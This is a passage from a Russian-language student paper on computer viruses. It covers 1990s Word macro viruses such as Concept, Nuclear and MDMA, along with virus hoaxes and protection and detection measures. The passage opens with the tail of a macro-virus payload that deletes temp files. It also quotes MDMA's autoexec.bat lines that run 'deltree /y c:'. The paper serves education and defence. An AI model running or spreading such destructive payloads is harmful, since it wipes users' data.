Kill Terap$
liP- Temp$ Dir
Loop
End Sub
Этот код является телом (payload) макровируса.
Именно он размещается в заражаемых документах.
Кроме того, для успешного внедрения в
создаваемые документы макровирус должен
заново переписать некоторые пункты меню
Файл: Сохранить, Новый и Сохранить как.
Однако это не так уж сложно. Более того,
проще создать копию макрокоманды, чем
записать копию вируса в другую макрокоманду.
Например, можно заменить пункт Закрыть
меню Файл макрокомандой DeleteAllTemp. Полиморфная
природа макровирусов заставляет создателей
антивирусных программ рассматривать
их как достаточно серьезную угрозу для
систем пользователей.
Некоторые распространенные макровирусы.
WordMacro/Concept, известный также как Word Prank Macro
или WWW6 Macro, - это макровирус, написанный
на внутреннем языке Microsoft Word 6.0. На самом
деле он состоит из нескольких макрокоманд:
AAAZAO, AAAZFS, AutoOpen, FileSaveAs и PayLoad. Необходимо
помнить то, что макрокоманды AutoOpen и FileSaveAs
являются стандартными. Макровирус пытается
заразить общий шаблон документов normal.dot.
Если же в процессе заражения вирус обнаружит,
что в файле шаблона уже находится макрокоманда
PayLoad или FileSaveAs, то он прекратит атаку.
Заразив общий шаблон, вирус начинает
заражать все документы, сохраненные с
помощью команды Сохранить как. Для обнаружения
вируса воспользуйтесь меню Сервис и выберите
в нем пункт Макрос. Если в появившемся
окне есть макрокоманда AAAZFS, то, скорее
всего, вирус уже поразил вашу систему.
Можно вылечить систему. Для этого достаточно
создать пустую макрокоманду с именем
PayLoad - она запишется поверх макрокоманды
вируса. Теперь система надежно защищена
от заражения. Ведь вирус, обнаружив эту
макрокоманду, посчитает, что система
уже заражена, и не станет ее заражать.
Однако создание макрокоманды-пустышки
- это лишь временное решение. Возможно,
что именно в этот момент кто-то изменяет
Concept так, чтобы он заражал систему, не
обращая внимания на макрокоманды, расположенные
в шаблоне normal.dot. Word Macro/Atom очень похож
на Concept. Однако есть и некоторые различия.
Автор этого макровируса зашифровал макрокоманду
вируса. Вирус воспроизводится во время
открытия или сохранения файла. Этот вирус
гораздо сложнее обнаружить, потому что
он зашифрован. Он производит два вида
разрушений, похожих по действию, но различных
в реализации.Макровирус активизируется
13 декабря. При этом он пытается удалить
все файлы из текущего каталога. Вторая
активизация наступает в тот момент, когда
пользователь запускает команду FileSaveAs,
а внутренние часы компьютера показывают
13 секунд. При этом на сохраняемый документ
накладывается пароль, и пользователь
больше не сможет открыть его. Чтобы остановить
действие вируса, нужно отключить автоматическое
выполнение макрокоманд или заставить
Word запрашивать разрешение на сохранение
изменений в normal.dot. Для этого откройте
меню Сервис и выберите пункт Параметры.
Выберите в появившемся диалоговом окне
закладку Сохранение и поставьте флажок
напротив пункта Запрос на сохранение
шаблона "Обычный".
Word Macro/Bandung состоит из шести макрокоманд:
AutoExec, AutoOpen, FileSave, FileSaveAs, ToolsCustomize и ToolsMacro.
При открытии зараженного файла (или запуске
Word с зараженным файлом общего шаблона)
после 11:00 начиная с двадцатого числа каждого
месяца (и до конца месяца) вирус удаляет
файлы во всех подкаталогах диска С:, за
исключением каталогов WINDOWS, WINWORD или WINWORD6.
Во время этой операции в строке состояния
высвечивается сообщение "Reading menu ...
Please Wait!". После удаления вирус создает
файл c:pesan.txt и оставляет в нем свое сообщение.Если
при просмотре зараженного документа
пользователь выберет меню Сервис, а в
нем пункт Макрос, то вирус отобразит на
экране диалоговое окно с сообщением "Fail
on step 29296" (в заголовке окна будет отображена
строка Егг@#*(с) и символ STOP). После этого
вирус заменит в документе все символы
а на #@, а затем сохранит документ. Как
вы уже, наверное, догадались, Word никогда
не проделывает таких операций.В 1995 году
в одну из групп новостей Usenet был помещен
вирус WordMacro/Colors. Иногда его еще называют
Rainbow. Вирус поддерживает в файле win.ini счетчик
поколений - он располагается в секции
[windows] в строке countersu-. При каждом выполнении
макрокоманды значение счетчика увеличивается
на единицу. После некоторого значения
вирус изменяет установки цветов системы.
При следующей загрузке Windows она будет
раскрашена в случайно подобранные цвета.
Этот макровирус заражает документы Word
так же, как и многие остальные вирусы.
Однако он не полагается на автоматическое
выполнение макрокоманд и активизируется
даже в том случае, если вы запустите Word
с параметром DisableAutoMacros или воспользуетесь
средствами защиты шаблонов от вирусов
(они расположены на Web-сайте http://www.microsoft.com).Имена
макрокомандAuto Close AutoExec AutoOpen FikExit FileNew FileSave
FileSaveAs ToolsMacro Macros
Во время выполнения одной из этих макрокоманд
вирус активизируется и заразит файл normal.dot.
После открытия зараженного документа
вирус будет выполняться при каждом создании
нового файла, закрытии зараженного файла
и сохранении открытого файла. Кроме того,
он будет выполняться и при открытии пункта
Макрос меню Сервис. Таким образом, не
нужно пользоваться этим пунктом для определения
вируса. Вместо этого необходимо открыть
меню Файл и выбрать пункт Шаблоны. Открыть
с его помощью диалоговое окно Организатор.
В этом окне выбрать закладку Макро. Теперь
вы можно спокойно обнаружить и удалить
опасные макрокоманды. Однако надо помнить,
что вирус может заново переписать их.
Отметим также, что автор этого вируса
- достаточно опытный программист: в вирусе
даже предусмотрен встроенный режим отладки.
Макровирус WordMacro/Hot содержит четыре макрокоманды.
Прежде всего этот вирус создает строку
в файле winword.ini, где записана "горячая
дата" – она должна наступить через
две недели после заражения. Строка выглядит
примерно так: QLHot=120401. После этого вирус
копирует в файл normal.dot макрокоманды
Начальные имена макрокоманд Конечные
имена макрокоманд
AutoOpen StartOfDoc
DrawBringln Front AutoOpen
InsertPBreak Insert Page Break
ToolsRepaginat FileSave
Если выбрать в меню Сервис пункт Макрос,
то в появившемся диалоговом окне мы увидим
имена макрокоманд. Спустя несколько дней
после наступления "горячей даты"
вирус активизируется и удалит выбранные
случайным образом файлы. Чтобы избавиться
от этого вируса, необходимо удалить его
макрокоманды.
Макровирус WordMacro/MDMA содержит всего лишь
одну макрокоманду - AutoClose. Этот макровирус
заражает все версии WinWord 6.0 и более поздние,
причем он действует и на PC, и на Macintosh.
Вирус активизируется первого числа каждого
месяца. Его действия зависят от компьютерной
платформы. На компьютерах Macintosh он пытается
удалить все файлы, расположенные в текущей
папке. Однако из-за ошибки в своем тексте
вирус не может выполнить своего предназначения.
При этом возникает синтаксическая ошибка,
и вирус не приносит никакого вреда. В
Windows NT вирус вытирает все файлы в текущем
каталоге, а также файл c:shmk. В Windows 95 вирус
удаляет файлы c:shmk, c:windows*.hlp и c:windowssystem*.cpl.
Кроме того, вирус устанавливает параметры
Stickykeys и HighContrast, а также сбрасывает параметр
выполнения сценариев входа в сеть. Из-за
ошибки в тексте вирусу не удается установить
параметр HighContrast. В Windows 3.1 вирус удаляет
файл c:shmk, а в файле autoexec.bat он размещает
следующие строки:
@ echo off
deltree /у с:
@ echo You have just been ** expletive deleted ** over by a virus
@ echo You are infected with MDMAJDMV.
@ echo Brought to you by MDMA
При попытке перегрузить компьютер вирус
удалит все файлы, размещенные на
диске с:.
Очень распространенным является макровирус
WordMacro/Nuclear. Как и остальные макровирусы,
он старается заразить основной шаблон
документов. Однако он не пытается раскрыть
своего присутствия с помощью диалоговых
окон. Вместо этого вирус незаметно инфицирует
каждый документ, созданный с помощью
пункта Сохранить как меню Файл. При этом
он добавляет к документу свою макрокоманду.
Чтобы не быть обнаруженным, при каждом
закрытии документа Nuclear сбрасывает флажок
Запрос на сохранение шаблона "Обычный".
После этого Word больше не будет запрашивать
у пользователя разрешение на сохранение
изменений файла normal.dot. Благодаря этому
вирус становится практически незаметным.
Дело в том, что многие пользователи используют
этот параметр для защиты от макровирусов.
Однако они и не догадываются о том, что
вирус может изменить его.Макрокоманда
вируса - PayLoad - пытается удалить системные
файлы io.sys, msdos.sys и command.com. Кроме того, вирус
добавляет в конце каждого напечатанного
или посланного по факсу (из Word) документа
в течение последних пяти секунд каждой
минуты следующие строки: "And finally I would
like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC". (A
напоследок я скажу: ПРЕКРАТИТЕ ВСЕ ФРАНЦУЗСКИЕ
АТОМНЫЕ ИСПЫТАНИЯ В ТИХОМ ОКЕАНЕ). Так
как эти строки добавляются только во
время печати, то пользователь не может
их увидеть во время просмотра документа.
Это действие производит макрокоманда
вируса Insert Pay Load. Чтобы уничтожить вирус,
необходимо воспользоваться пунктом Макрос
меню Сервис. Если обнаружится там макрокоманду
вроде InsertPayLoad, можно смело ее удалять.
Макровирус Word Macro/Wazz.it содержит всего
лишь одну макрокоманду - AutoOpen. Поэтому
он не зависит от языка. Другими словами,
этот макровирус может выполняться в локализованных
версиях Word. Вирус Wazzu изменяет содержание
зараженных документов: он перемешивает
слова и вставляет слово "wazzu". Трудно
определить, откуда пришел этот макровирус
Наилучшие решения для защиты от макровирусов.
Word 7.0 для Windows 95 и Windows NT, а также Word 97 автоматически
предупреждают пользователей о том, что
открываемый документ содержит макрокоманды.
Компания Microsoft создала для Word 6.0 специальное
средство борьбы с макровирусами-MVP (Macro
Virus Protection). MVP устанавливает набор защитных
макрокоманд, обнаруживающих подозрительные
файлы и предупреждающих пользователя
о потенциальной опасности открываемых
файлов. Чтобы загрузить это средство,
посетите Web-сайт компании Microsoft, расположенный
по адресу http://www.microsoft.com/word/freestuff/mvtool/mvtool2.htm.
С помощью этого
инструментального средства можно также
просматривать все документы Word, поступающие
по электронной почте или загруженные
из Internet. Самые последние версии Word (начиная
с Word 7.0) менее подвержены действию макровирусов.
Дело в том, что эти версии (вместе с новыми
версиями Excel, Access и PowerPoint) поддерживают
новый внутренний язык программирования
- Visual Basic for Application 5.0 (VBA). Он не совместим
с WordBasic. Кроме того, этот язык используется
в новых версиях Chameleon® (от NetManage), Photoshop®
(от Adobe) и AutoCAD® (от AutoDesk).Таким образом,
большинство старых макровирусов не смогут
нормально работать в рамках нового языка
разработки сценариев. Однако тот факт,
что один и тот же внутренний язык поддерживается
многими приложениями, может привести
к появлению нового поколения макровирусов,
которые смогут работать и заражать не
только Word, но также все остальные приложения
и их документы. Для получения более подробной
информации о макровирусах посетите Web-сайт
организации CIAC (Computer Incident Advisory Capability),
расположенный по адресу http://ciac.llnl.gov/ciac/bulletins/g-10a.shtml.
Кроме того, много интересной информации
о макровирусах расположено в списке Ричарда
Джона Мартина (ftp://ftp.gate. net/pub/users/ris 1/word.faq).
"МНИМЫЕ" ВИРУСЫ
В Internet существует огромное количество
предупреждений о вирусах. Большая часть
этих предупреждений относится к настоящим
компьютерным вирусам и является чуть
ли не единственным источником информации
о действии вирусов. С их помощью вы сможете
сэкономить время и защитить свои данные
от разрушения. Однако есть и такие люди,
которые любят поразвлечься, хотя и довольно
своеобразно. Эти "шутники" занимаются
тем, что распространяют в Internet сообщения
о "мнимых" вирусах, т. е. вирусах,
которых на самом деле не существует в
природе. Эти сообщения не только раздражают
пользователей, но и представляют некоторую
опасность. Вообразите не очень опытного
пользователя, встретившего подобное
сообщение о "сверхмогучем" компьютерном
вирусе. Кроме того, можно потратить огромное
количество времени на изучение нового
"мнимого" вируса, пропустив при этом
информацию о настоящих. В следующих разделах
я расскажу о наиболее известных "пустышках".
Вирус Irina
Сообщение о вирусе Irina появилось несколько
лет назад. Идея этого сообщения принадлежит
главе одного из электронных издательств.
Он посчитал, что это создаст дополнительную
рекламу интерактивной книге с таким же
названием. В первоначальном сообщении
электронной почты, подписанном вымышленным
профессором Эдвардом Прайдоксом (Edward
Prideaux) Лондонского колледжа славянских
языков, указывалось, что вирус передается
в электронных сообщениях, у которых в
строке темы сообщения стоит слово Irina.
Встретивший такое сообщение должен был
немедленно удалить его, иначе вирус уничтожит
все данные," размещенные на жестком
диске машины. Кроме того, автор сообщения
просил получателей сообщения о вирусе
"быть очень осторожными" и просил
их передать это предупреждение остальным
пользователям. Предупреждение о вирусе
Irina быстро обошло весь мир. Однако установлено,
что такого вируса нет и никогда не было.
Вирус Good Times
С сентября 1994 года в Internet циркулируют
предупреждения о вирусе Good Times. Несмотря
на то что описываемое в предупреждении
поведение вируса, попросту говоря, фантастично,
многие продолжают верить в его существование
и размножать сообщение о нем. Например,
в этом сообщении указывается, что вирус
Good Times может "заражать машины и без
передачи каких-либо программ". Кроме
того, "если программа не будет остановлена,
то процессор будет разрушен с помощью
использования бесконечного цикла л-ой
степени сложности". Здесь я позволю
себе заметить, что создатели процессоров
разработали их таким образом, чтобы они
могли выполнять огромное количество
повторений одних и тех же операций (циклов).
Кроме того, ни в математике, ни в программировании
не существует такого понятия, как бесконечный
цикл я-ой степени сложности. Но оказывается,
это еще не все. Дело в том, что, со слов
того же профессора Эдварда, "федеральная
комиссия по коммуникациям столь обеспокоена
вирусом Good Times, что разослала формальное
предупреждение всем пользователям персональных
компьютеров страны". На самом же деле
эта комиссия никогда не издавала и не
будет издавать никаких сообщений о вирусах
просто потому, что это не входит в круг
ее обязанностей.
Кроме того упомянем о "мнимых"
вирусах Deeyenda, Ghost.exe, Penpal Greetings! и Naughty Robot.
И это далеко не полный список.
AOL4FREE.COM
Один из наиболее известных "мнимых"
вирусов - это троянский конь aol4free.com. Согласно
сообщению, эта программа предлагает пользователям
бесплатный доступ к службе America Online, а
на самом деле уничтожает содержимое жесткого
диска. По иронии судьбы, теперь, когда
большая часть сообщества Internet уже знает
о том, что такого вируса нет, а сообщение
- это просто чья-то злая шутка, некоторые
создатели вирусов и вправду создали троянского
коня с именем aol4free.com. Этот вирус также
предлагает бесплатный доступ к службе
America Online, a (согласно сообщению) вместо
этого удаляет содержимое жесткого диска.
(Для этого он использует команду DELTREE.)
На самом деле жесткий диск все еще будет
содержать данные после проведения подобной
атаки - вирус удаляет только элементы
каталогов. Их можно восстановить с помощью
любой удобной утилиты, вроде тех, что
входят в пакеты Norton Utilities или Mace Utilities.
Для получения более подробной информации
о вирусе aol4free.com следует ознакомиться
со специальным бюллетенем, опубликованным
CIAC 17 апреля 1997 года. Его можно найти по
адресу http://ciac.llnl.gov.
Как отличить настоящий
вирус от мнимого?
Вы всегда можете верить сообщениям о
вирусах, рассылаемым специальными группами
из организаций по компьютерной безопасности
(некоторые из них приведены ниже). Большинство
этих организаций зашифровывают свои
сообщения с помощью PGP или другой системы
шифрования с открытым ключом. Чтобы идентифицировать
создателя сообщения, достаточно расшифровать
это сообщение с помощью открытого ключа
организации. ASSIST, The Automated Systems Security Incident
Support Team of the Department of Defense (http://www.assist.mil).CERT,
The Computer Emergency Response Team Coordination Center atCarnegie-Mellon
University (http://www.cert.org).CIAC, The U.S. Department of Energy
Computer Incident Advisory Capability (http://ciac.llnl.gov). NASIRC,
The NASA Automated Systems Incident Response Capability (http://nasirc.hq.nasa.gov).Еще
раз настоятельно рекомендую проверять
источник сообщения. Открытые ключи организаций
хранятся на их Web-страницах. Избегайте
сообщений, не прошедших процедуру идентификации.Если
же вы - администратор соединенной с Internet
системы, и вы обнаружили новый вирус,
не старайтесь скорее разослать сообщение
о "новой опасности" в группы новостей,
а сообщите об этом в CIAC или одну из перечисленных
выше организаций. Доверьтесь профессионалам.
8.Как защититься от вирусов ?
Чтобы защитить
свою сеть от вирусов, необходимо проделывать
с приходящими данными следующие три операции.
Во-первых, проверять всю приходящую информацию
с помощью антивирусных программ. Только
после этого можно запускать полученные
программы или просматривать пришедшие
документы. Во-вторых, необходимо поставить
антивирусное программное обеспечение
прямо в брандмауэре так, чтобы зараженные
файлы не могли проникнуть в сеть. Как
уже отмечалось, практически все брандмауэры
содержат средства проверки на вирусы.
Большинство из них содержат готовые антивирусные
программы, а также средства проверки
целостности данных. С их помощью можно
просматривать в реальном времени все
изменения в системе. Так можно заметить
большинство операций, производимых вирусами.
Кроме того, большинство брандмауэров
предоставляют средства защиты DOS-сеансов.
В-третьих, необходимо установить антивирусное
программное обеспечение на каждой подключенной
к сети машине. Так можно предотвратить
распространение вирусов по сети, если
одна из машин будет заражена.
9.Обнаружение
вирусов.
Для своей успешной
работы вирусам необходимо проверять,
не является ли файл уже зараженным (этим
же вирусом). Так они избегают самоуничтожения.
Для этого вирусы используют сигнатуру.
Большинство обычных вирусов (включая
и макровирусы) использует символьные
сигнатуры. Более сложные вирусы (полиморфные)
используют сигнатуры алгоритмов. Независимо
от типа сигнатуры вируса антивирусные
программы используют их для обнаружения
"компьютерных инфекций". После этого
антивирусная программа пытается уничтожить
обнаруженный вирус. Однако этот процесс
зависит от сложности вируса и качества
антивирусной программы. Как уже говорилось,
наиболее сложно обнаружить троянских
коней и полиморфные вирусы. Первые из
них не добавляют свое тело к программе,
а внедряют внутрь нее. С другой стороны,
антивирусные программы должны потратить
достаточно много времени, чтобы определить
сигнатуру полиморфных вирусов. Дело в
том, что их сигнатуры меняются с каждой
новой копией.
9.Резюме
Как уже говорилось,
вирусы представляют достаточно серьезную
опасность для сетей. Со временем эта опасность
возрастет, так как уже в настоящее время
появляется все больше и больше вирусов,
рассчитанных на работу в сети. Необходимо
отчетливо представлять себе надвигающуюся
опасность и быть во всеоружии. Важно помнить
что любой вирус внедряет свой код в тело
программы, благодаря чему он будет выполняться
при каждом ее запуске. Большинство вирусов
распространяется с помощью дискет. В
настоящее время имеется около тысячи
видов вирусов. Учитывая тот факт, что
каждый из них существует в нескольких
модификациях, нужно увеличить это число
в 5-10 раз. Большинство вирусов распространяется
одним из двух методов: заражая файлы или
загрузочные сектора. Файлы данных не
могут быть заражены вирусом. Однако существуют
так называемые макровирусы, которые распространяются
с помощью файлов шаблонов. В Internet существует
значительное количество "мнимых"
вирусов. Защититься от вирусов не так
уж сложно.
Контрольная работа
подготовлена при помощи материалов
выложенных на сайте :
www.superadm.net
|